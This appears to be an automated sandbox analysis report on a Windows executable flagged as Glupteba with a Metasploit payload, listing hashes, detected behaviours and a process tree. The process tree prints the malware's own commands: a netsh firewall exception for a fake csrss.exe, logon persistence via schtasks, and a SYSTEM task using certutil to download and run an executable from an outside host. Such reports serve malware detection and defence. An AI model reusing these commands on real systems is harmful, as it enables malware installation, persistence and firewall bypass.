Analysis

  • max time kernel
    171s
  • max time network
    194s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 18:32

General

  • Target

    a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe

  • Size

    3.9MB

  • MD5

    5625cb2982b7118b5e262fcfea2f4851

  • SHA1

    f34e4c803b7b89d5342d50aa42b2cbd55845e373

  • SHA256

    a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

  • SHA512

    78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

  • SSDEEP

    98304:EPOjA7HxZYd828AdJitFsozsNoQIU1ckttckumEeJWs:EWk7RZF4yil+QIU12s

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
    "C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1056
    • C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
      "C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:896
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1964
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:936
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1744
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1000
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193323.log C:\Windows\Logs\CBS\CbsPersist_20230129193323.cab
    1⤵
    • Drops file in Windows directory
    PID:1352

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    5625cb2982b7118b5e262fcfea2f4851

    SHA1

    f34e4c803b7b89d5342d50aa42b2cbd55845e373

    SHA256

    a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

    SHA512

    78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

  • \Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    5625cb2982b7118b5e262fcfea2f4851

    SHA1

    f34e4c803b7b89d5342d50aa42b2cbd55845e373

    SHA256

    a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

    SHA512

    78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

  • \Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    5625cb2982b7118b5e262fcfea2f4851

    SHA1

    f34e4c803b7b89d5342d50aa42b2cbd55845e373

    SHA256

    a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

    SHA512

    78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

  • memory/896-62-0x0000000000000000-mapping.dmp
  • memory/936-75-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/936-74-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/936-73-0x0000000000ED0000-0x0000000001278000-memory.dmp
    Filesize

    3.7MB

  • memory/936-71-0x0000000000ED0000-0x0000000001278000-memory.dmp
    Filesize

    3.7MB

  • memory/936-69-0x0000000000000000-mapping.dmp
  • memory/968-64-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/968-66-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/968-60-0x0000000000DE0000-0x0000000001188000-memory.dmp
    Filesize

    3.7MB

  • memory/968-58-0x0000000000DE0000-0x0000000001188000-memory.dmp
    Filesize

    3.7MB

  • memory/968-72-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/1056-54-0x0000000000FC0000-0x0000000001368000-memory.dmp
    Filesize

    3.7MB

  • memory/1056-61-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/1056-59-0x0000000001370000-0x0000000001B74000-memory.dmp
    Filesize

    8.0MB

  • memory/1056-57-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/1056-56-0x0000000001370000-0x0000000001B74000-memory.dmp
    Filesize

    8.0MB

  • memory/1056-55-0x0000000000FC0000-0x0000000001368000-memory.dmp
    Filesize

    3.7MB

  • memory/1964-65-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp
    Filesize

    8KB

  • memory/1964-63-0x0000000000000000-mapping.dmp